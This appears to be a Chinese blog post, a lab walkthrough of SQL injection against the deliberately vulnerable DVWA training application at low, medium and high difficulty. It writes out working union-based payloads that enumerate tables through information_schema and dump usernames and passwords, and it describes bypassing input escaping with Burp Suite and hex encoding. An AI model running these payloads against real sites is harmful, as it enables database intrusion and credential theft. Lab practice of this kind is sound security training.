dvwa-sql注入

一、SQL注入概念:

  SQL注入是指攻击者通过注入恶意的SQL命令,破坏SQL查询语句的结构,从而达到执行恶意SQL语句的目的。

二、手工注入常规思路

  1.判断是否存在注入,注入是字符型还是数字型

  2.猜解SQL查询语句中的字段数

  3.确定回显位置

  4.获取当前数据库

  5.获取数据库中的表

  6.获取表中的字段名

  7.得到数据

简单版:

  1.查看源代码:

dvwa-sql注入

  2.查看是否存在注入,以及注入的类型:

dvwa-sql注入

  3.猜解SQL查询语句中的字段数:

  3.1 1'order by 2#

dvwa-sql注入

  3.2 1'order by 3#

dvwa-sql注入

  3.3从上面两个图可以说明,SQL语句查询的表的字段数是2

  4.确定显示的位置(SQL语句查询之后的回显位)

  4.1、1' union select 1,2#    #下图可以看出有2个回显

dvwa-sql注入

  5.查询当前的数据库,以及版本

  5.1 1' union select version(),database()#

dvwa-sql注入

  6.获取数据库中的表:
1' union select 1,group_concat(table_name) from information_schema.tables where table_schema=database()#

dvwa-sql注入

  获取guestbook, users 两张表

  7.获取表中的字段名
1' union select 1, group_concat(column_name) from information_schema.columns where table_name='users'#

dvwa-sql注入

  8.查询字段中的数据:
1' union select user,password from users#

dvwa-sql注入

中等版:

  1.下图可以看到中级加入了一些防御,不让用户输入,只提供选择(可以用burpsuit抓包来绕过),
  2.分析源码可以看到对参数使用mysql_real_escape_string函数转义sql语句中的一些特殊字符,
  3.查看sql查询语句可以看出可能存在数字型sql注入

dvwa-sql注入

dvwa-sql注入

  4.通过burpsuite抓包,修改数据包,绕过防御
  4.1判断注入点,以及注入类型,有图可知是数字型注入

dvwa-sql注入
4.2猜解字段数
dvwa-sql注入
dvwa-sql注入
4.3查询回显位置
dvwa-sql注入

  可知两个回显位
  4.4获取数据库的名称以及版本:
1 union select database(),version()#

dvwa-sql注入
4.5获取数据库中的表名:

1 union select 1,group_concat(table_name)from information_schema where table_schema=database()#
  4.6获取表中的所有字段名
  考虑到单引号被转义,可以利用 16 进制进行绕过

  4.7获得字段数据:
1 union select user, password from users#

dvwa-sql注入

高等版:

  1.将dvwa设置为高级,可以看出,点击”here to change your ID”,页面自动跳转,防御了自动化的SQL注入,
  2.分析源码可以看到,对参数没有做防御,在sql查询语句中限制了查询条数,可以通过burpsuit抓包,修改数据包实现绕过

dvwa-sql注入

dvwa-sql注入

dvwa-sql注入

上一篇:DVWA-Command Injection


下一篇:DVWA-csp Bypass